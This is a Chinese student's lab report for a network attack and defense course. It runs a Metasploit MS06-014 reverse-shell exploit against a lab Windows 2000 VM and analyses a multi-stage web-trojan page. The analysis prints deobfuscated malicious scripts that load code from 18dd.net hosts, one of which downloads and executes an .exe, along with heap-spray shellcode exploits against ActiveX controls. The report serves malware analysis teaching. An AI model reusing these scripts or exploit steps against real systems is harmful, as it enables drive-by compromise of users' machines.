20252905 2025-2026-2 《网络攻防实践》第十一周作业
20252905 2025-2026-2 《网络攻防实践》第十一周作业
实践内容
(1)web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
实验步骤:
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
(2)取证分析实践—网页木马攻击场景分析
实践过程:
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
(3)攻防对抗实践—web浏览器渗透攻击攻防
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。
1.知识点梳理与总结
| 实践任务 | 核心目标 | 关键技术/工具 | 关键步骤/知识点 | 涉及漏洞/分析对象 |
|---|---|---|---|---|
| Web浏览器渗透攻击 | 使用Metasploit构造恶意网页木马,攻击Windows靶机浏览器,获取远程控制权 | Metasploit (msfconsole)、MS06-014漏洞模块、远程Shell PAYLOAD | ① 选择MS06-014渗透攻击模块 ② 设置PAYLOAD为反向Shell ③ 设置服务器地址和URL,生成恶意脚本 ④ 靶机访问恶意URL ⑤ 获取SESSION并执行远程命令 |
MS06-014 (Microsoft DataGrid控件漏洞) |
| 网页木马攻击场景分析 | 通过逆向分析挂马页面,逐层解密下载恶意文件,还原攻击链 | MD5哈希、静态反汇编、动态调试 | ① 访问start.html获取下一地址 ② 对新地址内容计算MD5值 ③ 按MD5值从指定服务器下载对应文件 ④ 分析文件:若为脚本继续解密;若为二进制进行逆向分析 |
多层嵌套的挂马页面、混淆脚本、二进制木马 |
| 浏览器渗透攻击对抗 | 攻击方:构造多漏洞的混淆挂马链接 防守方:解混淆,识别漏洞类型 |
渗透代码混淆、邮件伪造;反混淆分析、漏洞识别 | 攻击方: ① 选择两个以上浏览器漏洞 ② 生成渗透代码并混淆 ③ 组装成URL,通过邮件发送 防守方: ① 提取邮件中的挂马链接 ② 解混淆还原代码 ③ 识别攻击目标漏洞 |
多个Web浏览器软件安全漏洞 (如IE、Chrome等) |
2.实验过程
任务0:准备工作
(1)在Kali中将主机名称进行修改,并且查看ip地址为192.168.200.3
(2)winxp的2k地址为192.168.200.2
任务1:web浏览器渗透攻击
(1)在kali虚拟机中输入指令msfconsole,进入Metasploit
(2)输入指令search MS06-014,搜索渗透攻击模块
(3)使用该模块进行攻击,输入
设定使用的载荷:输入set payload generic/shell_reverse_tcp
设置攻击机LHOST地址(Kali):输入 set LHOST 192.168.200.3
设置攻击端口:输入 设置攻击端口:set lport 4446
使用命令exploit 进行攻击:得到有木马的网址如下http://192.168.200.3:8080/Q7JwNdSozepS0a
(4)在Win2k浏览器中访问木马网址,结果如下:
(5)在Kali中查看到成功建立连接,输入sessions查看连接
(6)输入sessions -i 1,攻击成功,成功获得控制权
任务2:取证分析实践—网页木马攻击场景分析
(1)使用记事本打开在学习通资料中下载的start.html
(2)查找new09
(3)找到new09.htm文件后,打开此文件,发现该文件引用了:http://aa.18dd.net/aa/kl.htm和http://js.users.51.la/1299644.js对其使用MD5加密得如下结果
(4)在学习通的压缩包解压的文件中搜索7F60672DCD6B5E90B6772545EE219BD3并打开
(5)在末尾发现密钥为\x73\x63\x72\x69\x70\x74
(6)对其进行10进制转化,得到script
(7)使用XXTEA工具对密文t进行解密,t来自kl.htm,密钥为script,密文内容是
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
其进行解密,得到结果
(8)再次对其进行转换,结果如下(我真服了,找线上工具都不咋朝气,还得是ds大人)
function init(){
document.write();
}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{
var e;
var ado = (document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as = ado.createobject("Adodb.Stream","")
}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http://aa.18dd.net/aa/1.js><\/script>")
}
else{
try{
var f;
var storm=new ActiveXObject("MPS.StormPlayer");
}
catch(f){};
finally{
if(f!="[object Error]"){
document.write("<script src=http://aa.18dd.net/aa/b.js><\/script>")
}
}
try{
var g;
var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");
}
catch(g){};
finally{
if(g!="[object Error]"){
document.write("<script src=http://aa.18dd.net/aa/pps.js><\/script>")
}
}
try{
var h;
var obj=new ActiveXObject("BaiduBar.Tool");
}
catch(h){};
finally{
if(h!="[object Error]"){
obj.DLoadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)
}
}
}
}
}
(9)在对这些代码段进行分析以后,发现它们利用了几款流行应用程序中的安全漏洞,包括微软的数据库访问组件Adodb.Stream、暴风影音(MPS.StormPlayer)、PPStream(PowerPlayer.PowerPlayerCtrl.1),以及百度的一款工具栏插件(BaiduBar.Tool)。这些漏洞表明攻击者试图通过已知的安全弱点来渗透目标系统或诱导用户下载恶意软件。
涉及到的网页地址有四个,它们被用作分发恶意脚本或组件的媒介:
采用相同的方法计算哈希值,结果如下
(10)打开对应的文件
文件1:5d7e9058a857aa2abee820d5473c5fa4
转换结果:
var url="http://down.18dd.net/bb/014.exe";
try{
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
xml.Open("GET",url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
path="..\\ntuser.com";
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute("cmd.exe","/c "+path,"","open",0)
}
catch(e){}```
典型的下载执行型恶意脚本
文件2:3870c28cc279d457746b3796a262f166
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var shellcode = unescape("%u57ff%u6461%u4320%u7972%u6461%ud88b%u7465%u468b%u4343%ufb03%uc683%u008b%u5afc%u016a%u0057%u5652%ue859%uc103%u6ae8%uc303%uf78b%ufa8b%u8b0e%u6ad0%u8300%u5904%u0dc6%u5e80%u03c6%u632f%u03c7%u6643%u206a%uff53%u5c03%u04c7%uec57%u646d%u6303%ufa75%u803e%u8046%u3680%u02e1%uc7dc%u8b40%uec83%u5613%ud1c3%u1e74%u8b3c%u738b%u0840%u0378%u8bf3%u3314%u4e8b%u207e%u8bad%u1c70%u9000%uf3e9%u5a90%ua164%u8b0c%u408b%u0030%u56ed%u5157%u2e61%u0324%ucd8b%u5e5f%u03e1%u33c1%u031c%u088b%u66c9%u59e9%ue245%u0e6a%uf28b%u3f8b%uf359%u74a6%ufcef%u835f%u5908%uc1c3%u50c0%u6e6f%u6d6c%u7275%u6172%u5500%u4c52%u6f6c%u6e77%u6f44%u6269%u4c64%u7845%u0063%u456e%u6957%u7469%u6854%u616f%u4c00%u6572%u6f54%u6946%u6662%u2f62%u622f%u6e2e%u652e");
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
memory = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + memory;
fillblock = new Array();
for (i = 0; i < 300; i++) fillblock[i] = block + shellcode;
var buffer = '';
while (buffer.length < 4068) buffer += "\x0a\x0a\x0a\x0a";
storm.DLoadDS(buffer);
这是一段经过多层混淆的 JavaScript,执行后会在内存中运行一段 shellcode,用于下载并执行恶意程序,或直接建立远程后门。
文件3:5f0b8bf0385314dbe0e5ec95e6abedc2
// 1. 创建 ActiveX 对象 "p_p_s"
pps = document.createElement("object");
pps.setAttribute("classid", "clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458");
// 2. 构造 shellcode(大量十六进制数据,实际是机器码)
var shellcode = unescape("%uF3E9%u0000" + ...);
// 3. 堆喷射 + NOP sled
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
// 4. 填充内存
memory = new Array();
for (x = 0; x < 400; x++) memory[x] = block + shellcode;
// 5. 构造 500 字节的缓冲区
var buffer = '';
while (buffer.length < 500) buffer += "\x0a\x0a\x0a\x0a";
// 6. 触发漏洞
pps.Logou = buffer;```
利用 PPS 控件漏洞(暴风影音 / PPS 流媒体漏洞)执行 shellcode
文件4:1c1d7b3539a617517c49eee4120783b2
在original中打开bd.cab,得到bd.exe
用ida进行分析,发现其下载了二十个可执行程序,有坏蛋。
任务3:攻防对抗实践—web浏览器渗透攻击攻防
(1)在成功取得权限后,输入ipconfig可查看到win2k的ip地址
(2)在win2k中,在网页中,右键查看源文件,发现文件中存在着大量的空白,其目的是绕过静态检测 + 增加分析成本
(3)分析sgcz(o, n) —— COM 接口适配器,MqDArxxubTFz(a) —— 主攻击分发器,NOphdzImeDtiTnvUTsrC() —— 漏洞探测与触发
总结为高度模块化、高兼容性、高隐蔽性的挂马脚本,不依赖单个漏洞,而是批量探测目标系统中所有可能被利用的 ActiveX 控件,一旦发现就立即下载并执行恶意负载。
(4)代码的原始形态
(5)攻击的漏洞:
CLSID 组件 对应漏洞/风险
{BD96C556-65A3-11D0-983A-00C04FC29E36} Adodb.Stream MS06-014 / CVE-2006-0003:MDAC 漏洞,可写文件 + 执行命令
{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} WScript.Shell 可执行任意系统命令
{0D43FE01-F093-11CF-8940-00A0C9054228} Shell.Application 可执行 ShellExecute
{A85D5E9C-8D3A-4A97-9B60-B996349345C6} Microsoft.XMLHTTP 用于下载,非漏洞本身,但被滥用
3.学习中遇到的问题及解决
-问题1:exploit攻击这里有报错
解决方案:这里我前后修改了两节课,更换载荷,修改端口,修改ActiveX控件,网络模式,始终没有解决这个问题,跟老师也讨论了很久,前后换了四五版方案,现在想来应当是环境固件本身的问题,最后更换win2k作为靶机就成功了,无论如何,但我对这个漏洞利用的原理也算是理解更加深入了,希望同志们尽量不要碰到这个问题,机魂不悦了是!
-问题2:防火墙发力了,文件干的没剩几个了是
解决办法:主要winxp的解压好像不大好用,,,也没办法,现代化的防火墙安全性确实提高了不少是
3.学习感悟、思考等
本次实验围绕浏览器渗透攻击展开,核心是利用Web浏览器的安全漏洞,通过Metasploit框架生成恶意网页木马脚本,诱导靶机访问后实现远程代码执行,从而获取目标主机的控制权。攻击流程包括:选择漏洞模块、设置远程Shell类型的PAYLOAD、配置服务器地址并运行exploit生成恶意URL,靶机访问后攻击端即可建立SESSION会话并远程执行命令。在取证分析环节,通过逐层解密挂马页面中的混淆地址,计算MD5值并从指定服务器下载对应的脚本或二进制文件,重复解密直到获得完整的恶意代码样本,最终通过静态反汇编或动态调试分析其行为特征,还原完整的攻击链。
攻防对抗实践中,攻击方需构造至少两个不同浏览器的漏洞渗透代码,进行混淆处理后嵌入URL并通过欺骗性邮件传播;防守方则需提取邮件中的挂马链接,逆向解混淆还原原始渗透代码,识别其攻击的目标漏洞类型。这一过程要求熟练掌握Metasploit的载荷生成与混淆技巧,同时具备扎实的逆向分析和漏洞识别能力。通过本次实验,深入理解了网页木马的传播机制、浏览器漏洞的利用方式以及恶意代码的隐蔽对抗技术,提升了在真实网络环境中针对Web浏览器攻击的检测、分析与防御能力。
参考资料
教学视频
浙公网安备 33010602011771号